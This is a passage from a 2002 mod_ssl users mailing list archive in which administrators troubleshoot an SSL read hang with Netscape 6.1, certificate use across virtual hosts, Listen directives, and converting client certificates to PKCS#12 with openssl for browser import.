%{SSL_CIPHER}x \"%r\" %b" >> >> >> MT> You need the SSLCertificateFile and SSLCertificateKeyFile directives too - Ok I have those now. -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 19 22:39:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16766; Tue, 19 Feb 2002 22:38:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marlborough.cnchost.com id WAA16613; Tue, 19 Feb 2002 22:37:26 +0100 (MET) Received: from WGUARALDI2 ([4.17.140.34]) by marlborough.cnchost.com id LAA28666; Tue, 19 Feb 2002 11:22:15 -0500 (EST) [ConcentricHost SMTP Relay 1.14] From: "Will Guaraldi" To: Subject: RE: mod_ssl blocking on NS 6.1 HTTPS post Date: Tue, 19 Feb 2002 11:22:14 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Will Guaraldi" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I do know that the ap_check_alarm is a function of the Apache server, but I want to understand why mod_ssl is calling it in ssl_engine_io.c in the SSL_recvwithtimeout function. The specific code in question is this: static int SSL_recvwithtimeout(BUFF *fb, char *buf, int len) { int iostate = 1; fd_set fdset; struct timeval tv; int err = WSAEWOULDBLOCK; int rv; int sock = fb->fd_in; SSL *ssl; int retry; ssl = ap_ctx_get(fb->ctx, "ssl"); // here for some reason ap_check_alarm() returns a 0 and it goes // into a blocking SSL_read and never returns if (!(tv.tv_sec = ap_check_alarm())) return (SSL_read(ssl, buf, len)); rv = ioctlsocket(sock, FIONBIO, &iostate); iostate = 0; ap_assert(!rv); rv = SSL_read(ssl, buf, len); if (rv <= 0) { if (BIO_sock_should_retry(rv)) { do { retry = 0; ... Anyone have any ideas? Am I posting this on the wrong list? /will wguaraldi@byallaccounts.com > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of Will Guaraldi > Sent: Wednesday, February 13, 2002 1:00 PM > To: mod_ssl > Subject: mod_ssl blocking on NS 6.1 HTTPS post > > > We seem to be having a problem with Netscpae 6.1 and 6.2 when interacting > with mod_ssl. We're running Apache 1.3.20 (Win32) ApacheJServ/1.1.2 > mod_ssl/2.8.4 on a Windows 2000 Server. We're compiling it using > VC++ 6.0. > > The problem manifests itself like this. We're doing an HTTPS > post to a Java > Servlet. In IE versions we've tested, everything goes along just fine. > When using Netscape 6.1 or 6.2 (6.0 is fine), the HTTPS post hangs. > > I've been running Apache through the debugger and this is what I'm > observing: > > I set Netscape 6.1 or 6.2 to do the HTTPS post request. mod_ssl cycles > through SSL_recvwithtimeout in ssl_engine_io.c a few times. > > The first time it picks up half the HTTP headers, the second time it picks > up the other half of the HTTP headers and a smidgeon of POST data. > > On the third cycle through that code, it reaches the following snippet at > the very top of the SSL_recvwithtimeout function: > > if (!(tv.tv_sec = ap_check_alarm())) > return (SSL_read(ssl, buf, len)); > > ap_check_alarm() is returning a 0 into tv.tv_sec. This causes the code to > do the SSL_read, but it blocks on the read and never comes back unless I > kill the browser process. > > When I use IE and go through the same procedure, the ap_check_alarm() call > returns a variety of numbers all in the upper 200's--it never returns a 0. > > I've read through the mod_ssl archives and the Mozilla bugs and > noticed that > there was a point in the Mozilla builds where it was having problems with > HTTP posts. I can't tell if that's related to this or not. I do > know that > if I use Mozilla .9.8 everything works fine. > > I have a few questions. Why does mod_ssl execute ap_check_alarm?--I read > through the code, but I'm not seeing the 50' view of what's going on. And > why would it return a 0, but only with Netscape 6.1 and 6.2? > > Any help is greatly appreciated-- > > /will > wguaraldi@byallaccounts.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 19 23:47:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA25567; Tue, 19 Feb 2002 23:46:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pladesigns.com id XAA25520; Tue, 19 Feb 2002 23:45:19 +0100 (MET) Received: from merlin.pladesigns.com [172.25.190.2] by pladesigns.com [63.105.23.195] with SMTP (MDaemon.v3.5.7.R) for ; Tue, 19 Feb 2002 06:49:36 -0800 Received: FROM cairo.pladesigns.com BY merlin.pladesigns.com ; Tue Feb 19 06:49:35 2002 -0800 Received: by CAIRO with Internet Mail Service (5.5.2448.0) id ; Tue, 19 Feb 2002 06:33:22 -0800 Message-ID: <91FBD0B430EFD5118B930060672D982C0CC1@CAIRO> From: David Buerer To: modssl-users@modssl.org Subject: RE: Certificate Date: Tue, 19 Feb 2002 06:33:21 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain X-MDRemoteIP: 172.25.190.2 X-Return-Path: David@pladesigns.com X-MDaemon-Deliver-To: modssl-users@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Buerer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users To my knowledge and research, a certificate issued by an authority like Verisign or Thwate is only valid for one specific domain UNLESS you purchase a certificate which indicates otherwise. I know Thwate has one version of their cert which applies to the root domain and all sub-domains under it as well. -----Original Message----- From: Jose Torres [mailto:sunjoet@speakeasy.net] Sent: Monday, February 18, 2002 7:24 PM To: modssl-users@modssl.org Subject: RE: Certificate Hi, all, I am looking for this response. If there was one, I also need to know if it is possible to run two vhosts with a single certificate? TIA -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Santosh Deshpande Sent: Monday, February 11, 2002 10:09 AM To: modssl-users@modssl.org Subject: Certificate hi all, I would like to know whether a SSL certificate is issued to a specific domain? Can I run have two vhosts configured with a single certificate e.g. www.mydomain.com ( 213.x.x.x:443) and sub.mydomain.com ( 213.x.x.y:443) regards, Santosh ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 13:55:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA08720; Wed, 20 Feb 2002 13:54:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id NAA08611; Wed, 20 Feb 2002 13:53:50 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g1KCrno4781732 for modssl-users@modssl.org; Wed, 20 Feb 2002 13:53:49 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa0IVB4; Wed Feb 20 13:53:45 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id NAA23361 for ; Wed, 20 Feb 2002 13:52:26 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id NAA31844 for modssl-users@modssl.org; Wed, 20 Feb 2002 13:44:09 +0100 (MET) Date: Wed, 20 Feb 2002 13:44:09 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: How do I check to see if it works? Message-ID: <20020220134409.A4000673@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: <1386107842.20020218102849@e-box.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <1386107842.20020218102849@e-box.dk>; from neigaard@e-box.dk on Mon, Feb 18, 2002 at 10:28:49AM +0100 Organization: arago GmbH X-MIME-Autoconverted: from 8bit to quoted-printable by carat.arago.de id NAA23361 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA08649 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Mon, Feb 18, 2002 at 10:28:49AM +0100, Søren Neigaard wrote: > Anyway I have attached a snippet from my httpd.conf, where I have > tried to adjust the example to my needs. Now I was hoping you guys > could tell me if it look ok. It looks like this: > > > > [...] > > Have you also got something like Listen 443 or Listen 192.168.1.4:443 in your httpd.conf? It's not enough to specify IP addresses and ports in , you also explicitly have to make Apache listen on those adresses and ports. By default, Apache will only listen on *:80 Ciao Thomas -- bureaucrat, n: A politician who has tenure. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 15:06:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA17305; Wed, 20 Feb 2002 15:06:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from net.rongage.org id PAA17096; Wed, 20 Feb 2002 15:04:29 +0100 (MET) Received: from localhost (nobody@localhost [127.0.0.1]) by net.rongage.org (8.10.2/8.10.2) with ESMTP id g1KE4PN20927 for ; Wed, 20 Feb 2002 09:04:25 -0500 Received: from 64.113.37.141 ( [64.113.37.141]) as user ron@net.rongage.org by webmail.rongage.org with HTTP; Wed, 20 Feb 2002 09:04:25 -0500 Message-ID: <1014213865.3c73ace9a3784@webmail.rongage.org> Date: Wed, 20 Feb 2002 09:04:25 -0500 From: Ron Gage To: modssl-users@modssl.org Subject: Client Certificate questions MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 64.113.37.141 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ron Gage X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Folks: I am having problems getting a self-signed identity (client) cert installed into my browsers (Mozilla 0.9.8 and Netscape 4.78). The cert is signed and tested to be valid, I just can't find the right method to install it into my browser. I even tried copying the ident.crt to ident.pem and browsing it with the browsers. This installed the cert as a server cert, not an identity cert. Can anyone provide any hints on how to install a client cert? Thanks! -- Ron Gage - Owner, Linux Network Services - Saginaw, Michigan - 989-274-8088 Your one-stop source for Reliable, Secure and Affordable Networking Solutions ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 15:45:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA20482; Wed, 20 Feb 2002 15:44:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id PAA20420; Wed, 20 Feb 2002 15:43:24 +0100 (MET) Received: (qmail 24363 invoked by uid 500); 20 Feb 2002 14:46:54 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 20 Feb 2002 14:46:54 -0000 Date: Wed, 20 Feb 2002 14:46:54 +0000 (GMT) From: Laurie Young To: Subject: Client Certificate DN In-Reply-To: <1014213865.3c73ace9a3784@webmail.rongage.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I have an apache set has a directoy configured so taht only browsers with a certificate signed from the correct CA can access it. What I would like to do is that the DN of the certifiacte set as an envirnment variable. Can anyone tell me how to do this? Laurie -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 16:29:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA24776; Wed, 20 Feb 2002 16:28:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from owl4.owl.co.uk id QAA24664; Wed, 20 Feb 2002 16:27:20 +0100 (MET) Received: from owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk (Rockliffe SMTPRA 3.4.2) with ESMTP id for ; Wed, 20 Feb 2002 15:17:00 +0000 Message-ID: <3C73BDE9.6060401@owl.co.uk> Date: Wed, 20 Feb 2002 15:16:57 +0000 From: CAM Organization: OWL User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Client Certificate questions References: <1014213865.3c73ace9a3784@webmail.rongage.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: CAM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Ron Gage wrote: > Hi Folks: > > I am having problems getting a self-signed identity (client) cert installed into > my browsers (Mozilla 0.9.8 and Netscape 4.78). > > The cert is signed and tested to be valid, I just can't find the right method to > install it into my browser. I even tried copying the ident.crt to ident.pem and > browsing it with the browsers. This installed the cert as a server cert, not an > identity cert. > > Can anyone provide any hints on how to install a client cert? Thanks! Ron, Not certain about the versions here - I was using NS6.2 on windoze which I believe has the same codebase as Moz 0.9.6, no? Anyway, in the Certificate Manager, we used the (perhaps slightly misnamed) Restore function to pick up a PKCS#12 file from the local filesystem. This was just the client certificate reworked into PKCS#12 format with openssl - the restore file dialog filters for .p12's... HTH colm ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 16:40:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA25652; Wed, 20 Feb 2002 16:39:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtp.digikom.net id QAA25587; Wed, 20 Feb 2002 16:38:08 +0100 (MET) Received: from s20.dknet.se ([10.0.0.55]) by smtp.digikom.net with Microsoft SMTPSVC(5.0.2195.3779); Wed, 20 Feb 2002 16:35:12 +0100 Received: from [192.168.0.104] [213.66.238.106] by s20.dknet.se with ESMTP (SMTPD32-6.06) id A2D5FA630114; Wed, 20 Feb 2002 16:37:57 +0100 User-Agent: Microsoft-Entourage/10.0.0.1428 Date: Wed, 20 Feb 2002 16:38:02 +0100 Subject: Re: Client Certificate questions From: G=?ISO-8859-1?B?9nJhbiBGcvY=?=jdh To: Message-ID: In-Reply-To: <1014213865.3c73ace9a3784@webmail.rongage.org> Mime-version: 1.0 Content-type: text/plain; charset="ISO-8859-1" X-OriginalArrivalTime: 20 Feb 2002 15:35:12.0828 (UTC) FILETIME=[2FE60FC0:01C1BA24] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA25646 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: G=?ISO-8859-1?B?9nJhbiBGcvY=?=jdh X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Den 02-02-20 15.04 skrev "Ron Gage" följande: > Hi Folks: > > I am having problems getting a self-signed identity (client) cert installed > into > my browsers (Mozilla 0.9.8 and Netscape 4.78). > > The cert is signed and tested to be valid, I just can't find the right method > to > install it into my browser. I even tried copying the ident.crt to ident.pem > and > browsing it with the browsers. This installed the cert as a server cert, not > an > identity cert. > > Can anyone provide any hints on how to install a client cert? Thanks! In Netscape and Mozilla, you can import a standard pkcs12 certificate (.pk12 extension), but it's a bit more tedious. It's done via Netscape Prefences > Privacy & Security > Certificates. Click on "Manage Securities" and "Restore". Enter your signed certificate, and it will install itself. /goran ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 17:44:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA02417; Wed, 20 Feb 2002 17:43:48 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from net.rongage.org id RAA02170; Wed, 20 Feb 2002 17:41:42 +0100 (MET) Received: from localhost (nobody@localhost [127.0.0.1]) by net.rongage.org (8.10.2/8.10.2) with ESMTP id g1KGfdQ01053 for ; Wed, 20 Feb 2002 11:41:39 -0500 Received: from 64.113.37.141 ( [64.113.37.141]) as user ron@net.rongage.org by webmail.rongage.org with HTTP; Wed, 20 Feb 2002 11:41:38 -0500 Message-ID: <1014223298.3c73d1c2bb7a9@webmail.rongage.org> Date: Wed, 20 Feb 2002 11:41:38 -0500 From: Ron Gage To: modssl-users@modssl.org Subject: Re: Client Certificate questions References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 64.113.37.141 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ron Gage X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Quoting Göran Fröjdh : > Den 02-02-20 15.04 skrev "Ron Gage" följande: > > > Hi Folks: > > > > I am having problems getting a self-signed identity (client) cert > installed into my browsers (Mozilla 0.9.8 and Netscape 4.78). > > > > The cert is signed and tested to be valid, I just can't find the right > method to install it into my browser. I even tried copying the ident.crt to > ident.pem and browsing it with the browsers. This installed the cert as a server cert, not an identity cert. > > > > Can anyone provide any hints on how to install a client cert? Thanks! > > In Netscape and Mozilla, you can import a standard pkcs12 certificate > (.pk12 > extension), but it's a bit more tedious. It's done via Netscape Prefences > > Privacy & Security > Certificates. Click on "Manage Securities" and > "Restore". Enter your signed certificate, and it will install itself. > /goran > Great. I tried the following: root@net:/home/ron# openssl x509 -in ident.crt -out ident.p12 -outform pkcs12 I tried to import this file into netscape and into mozilla. No go - they both complain that the cert is corrupted. I guess this begs the question: how does one go about creating the pkcs12 format certificate? Thanks -- Ron Gage - Owner, Linux Network Services - Saginaw, Michigan - 989-274-8088 Your one-stop source for Reliable, Secure and Affordable Networking Solutions ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 18:17:28 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA05671; Wed, 20 Feb 2002 18:16:55 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from owl4.owl.co.uk id SAA05479; Wed, 20 Feb 2002 18:16:09 +0100 (MET) Received: from owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk (Rockliffe SMTPRA 3.4.2) with ESMTP id for ; Wed, 20 Feb 2002 17:16:12 +0000 Message-ID: <3C73D9DC.3000203@owl.co.uk> Date: Wed, 20 Feb 2002 17:16:12 +0000 From: CAM Organization: OWL User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Client Certificate questions References: <1014223298.3c73d1c2bb7a9@webmail.rongage.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: CAM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Great. I tried the following: > > root@net:/home/ron# openssl x509 -in ident.crt -out ident.p12 -outform pkcs12 > > I tried to import this file into netscape and into mozilla. No go - they both > complain that the cert is corrupted. I guess this begs the question: how does > one go about creating the pkcs12 format certificate? Try: openssl pkcs12 -in client.crt -inkey client.key -certfile ca.crt -out client.p12 -export The filenames should be self-explanatory - let me know if not. HTH colm ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 18:23:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA05892; Wed, 20 Feb 2002 18:18:03 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from Mail6.nc.rr.com id SAA05450; Wed, 20 Feb 2002 18:16:03 +0100 (MET) Received: from dino.krumpli.com ([24.25.14.8]) by Mail6.nc.rr.com with Microsoft SMTPSVC(5.5.1877.687.68); Wed, 20 Feb 2002 12:14:40 -0500 Received: from dino (dino.krumpli.com [192.168.10.1]) by dino.krumpli.com (Build 101 8.9.3/NT-8.9.3) with ESMTP id MAA00043 for ; Wed, 20 Feb 2002 12:14:10 -0500 From: "tom porter" To: Subject: RE: Client Certificate questions Date: Wed, 20 Feb 2002 12:14:10 -0500 Message-ID: <000201c1ba32$031bcfd0$010aa8c0@krumpli.com> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <1014223298.3c73d1c2bb7a9@webmail.rongage.org> Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "tom porter" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > > > Hi Folks: > > > > I am having problems getting a self-signed identity (client) cert > installed into my browsers (Mozilla 0.9.8 and Netscape 4.78). > > > > The cert is signed and tested to be valid, I just can't find the > > right > method to install it into my browser. I even tried copying the > ident.crt to ident.pem and browsing it with the browsers. This > installed the cert as a server cert, not an identity cert. > > > > Can anyone provide any hints on how to install a client cert? > > Thanks! > > In Netscape and Mozilla, you can import a standard pkcs12 certificate > (.pk12 extension), but it's a bit more tedious. It's done via Netscape > Prefences > Privacy & Security > Certificates. Click on "Manage > Securities" and "Restore". Enter your signed certificate, and it will > install itself. /goran This doesn't work for me (FreeBSD 4.4 - mozilla). Mozilla dumps core. Don't know why... Great. I tried the following: root@net:/home/ron# openssl x509 -in ident.crt -out ident.p12 -outform pkcs12 I tried to import this file into netscape and into mozilla. No go - they both complain that the cert is corrupted. I guess this begs the question: how does one go about creating the pkcs12 format certificate? openssl pkcs12 -export -in server_cert.pem -inkey server_key.pem -out yourcert.p12 Enter Export Password: Verifying password - Enter Export Password: ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 18:46:43 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA09190; Wed, 20 Feb 2002 18:45:59 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from net.rongage.org id SAA09133; Wed, 20 Feb 2002 18:45:11 +0100 (MET) Received: from localhost (nobody@localhost [127.0.0.1]) by net.rongage.org (8.10.2/8.10.2) with ESMTP id g1KHj7Q01624 for ; Wed, 20 Feb 2002 12:45:07 -0500 Received: from 64.113.37.141 ( [64.113.37.141]) as user ron@net.rongage.org by webmail.rongage.org with HTTP; Wed, 20 Feb 2002 12:45:07 -0500 Message-ID: <1014227107.3c73e0a330512@webmail.rongage.org> Date: Wed, 20 Feb 2002 12:45:07 -0500 From: Ron Gage To: modssl-users@modssl.org Subject: Re: Client Certificate questions References: <1014223298.3c73d1c2bb7a9@webmail.rongage.org> <3C73D9DC.3000203@owl.co.uk> In-Reply-To: <3C73D9DC.3000203@owl.co.uk> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 64.113.37.141 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ron Gage X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Quoting CAM : > > > Great. I tried the following: > > > > root@net:/home/ron# openssl x509 -in ident.crt -out ident.p12 -outform > pkcs12 > > > > I tried to import this file into netscape and into mozilla. No go - they > both > > complain that the cert is corrupted. I guess this begs the question: how > does > > one go about creating the pkcs12 format certificate? > > > Try: > > openssl pkcs12 -in client.crt -inkey client.key -certfile ca.crt -out > client.p12 > -export > It worked! Thank you everyone for your assistance. Time to write a HOWTO on this - sheeze! > The filenames should be self-explanatory - let me know if not. > > HTH > colm > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > -- Ron Gage - Owner, Linux Network Services - Saginaw, Michigan - 989-274-8088 Your one-stop source for Reliable, Secure and Affordable Networking Solutions ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 20 21:49:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA27384; Wed, 20 Feb 2002 21:48:55 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe040.worldonline.dk id VAA27307; Wed, 20 Feb 2002 21:47:46 +0100 (MET) Received: (qmail 754 invoked by uid 0); 20 Feb 2002 20:47:37 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe040.worldonline.dk with SMTP; 20 Feb 2002 20:47:37 -0000 Date: Wed, 20 Feb 2002 21:46:39 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <259251402.20020220214639@e-box.dk> To: Thomas Binder CC: modssl-users@modssl.org Subject: Re[2]: How do I check to see if it works? In-Reply-To: <20020220134409.A4000673@ohm.arago.de> References: <1386107842.20020218102849@e-box.dk> <20020220134409.A4000673@ohm.arago.de> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Wednesday, February 20, 2002, 1:44:09 PM, Thomas wrote: TB> Hi! TB> On Mon, Feb 18, 2002 at 10:28:49AM +0100, Søren Neigaard wrote: >> Anyway I have attached a snippet from my httpd.conf, where I have >> tried to adjust the example to my needs. Now I was hoping you guys >> could tell me if it look ok. It looks like this: >> >> >> >> [...] >> >> TB> Have you also got something like TB> Listen 443 TB> or TB> Listen 192.168.1.4:443 TB> in your httpd.conf? It's not enough to specify IP addresses and TB> ports in , you also explicitly have to make Apache TB> listen on those adresses and ports. By default, Apache will only TB> listen on *:80 I have the following: Port 80 Listen 80 Listen 443 Why do I have dublicats of port 80? Do you even think my module is installed correctly, can I check this? -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 10:17:31 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA17636; Thu, 21 Feb 2002 10:16:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from d12lmsgate-3.de.ibm.com id KAA17611; Thu, 21 Feb 2002 10:16:06 +0100 (MET) Received: from d12relay01.de.ibm.com (d12relay01.de.ibm.com [9.165.215.22]) by d12lmsgate-3.de.ibm.com (1.0.0) with ESMTP id KAA58276 for ; Thu, 21 Feb 2002 10:15:59 +0100 Received: from d08ml401.at.ibm.com 